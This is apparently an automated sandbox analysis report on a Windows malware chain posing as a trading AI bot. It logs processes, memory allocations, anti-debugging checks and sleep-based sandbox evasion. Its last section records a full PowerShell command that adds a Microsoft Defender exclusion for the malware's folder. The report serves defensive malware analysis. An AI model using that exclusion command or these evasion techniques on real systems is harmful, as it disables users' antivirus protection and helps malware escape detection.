                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF  Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (80 identical events)
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Process information set: NOOPENFILEERRORBOX (34 identical events)
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF  Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (80 identical events)
                      Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2DB0000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2DB1000 memory commit 500178944
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2DDC000 memory commit 500002816
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2DDD000 memory commit 500199424
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2E0E000 memory commit 501014528
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2F06000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2F08000 memory commit 500015104
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 2C30000 memory commit 500006912
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 2C31000 memory commit 500178944
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 2C5C000 memory commit 500002816
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 2C5D000 memory commit 500199424
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 2C8E000 memory commit 501014528
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 2D86000 memory commit 500006912
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: 2D88000 memory commit 500015104
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2B90000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2B91000 memory commit 500178944
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2BBC000 memory commit 500002816
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2BBD000 memory commit 500199424
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2BEE000 memory commit 501014528
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2CE6000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: 2CE8000 memory commit 500015104
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Memory allocated: 2EA90000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Memory allocated: 2EF40000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Memory allocated: 2ED80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: ED0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 2B90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 29F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 5C30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 2DC30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Memory allocated: BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Memory allocated: 2640000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Memory allocated: 4640000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Memory allocated: 31CD0000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Memory allocated: 31F70000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Memory allocated: 31CD0000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Memory allocated: 23450000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Memory allocated: 25480000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Memory allocated: 252E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Memory allocated: 780000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Memory allocated: 2400000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Memory allocated: 4400000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 10_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5587
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 356
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Window / User API: threadDelayed 2394
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Window / User API: threadDelayed 7396
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 1484; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 1924; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2136; Thread sleep count: 5587 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2548; Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 504; Thread sleep count: 356 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3416; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 5948; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 5464; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7144; Thread sleep time: -143640000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7144; Thread sleep time: -443760000s >= -30000s
                      Source: C:\Windows\System32\dllhost.exe; File opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 6_2_02C358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Thread delayed: delay time: 60000
                      Source: x.exe, 00000006.00000002.2450193992.00000000005B0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWhs_%SystemRoot%\system32\mswsock.dll
                      Source: Oupzhkpr.PIF, 00000019.00000002.2768525575.00000000006C5000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                      Source: Microsofts.exe, 0000000D.00000002.4620201909.0000000000800000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
                      Source: x.exe, 00000006.00000002.2450193992.00000000005F0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                      Source: x.exe, 00000006.00000002.2450193992.00000000005F0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW,
                      Source: Oupzhkpr.PIF, 00000015.00000002.2593221559.000000000079E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; API call chain: ExitProcess graph end node
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; API call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Process information queried: ProcessInformation

                      Anti Debugging

                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 6_2_02C4EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 10_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 10_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 6_2_02C487A0 LoadLibraryW,GetProcAddress,FreeLibrary
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 10_1_0040ADB0 GetProcessHeap,HeapFree
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Process token adjusted: Debug
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 10_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 10_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 10_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 10_1_004123F1 SetUnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 24_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 24_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 24_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 24_2_004123F1 SetUnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 29_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 29_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 29_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 29_2_004123F1 SetUnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 29_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 29_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 29_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: 29_1_004123F1 SetUnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
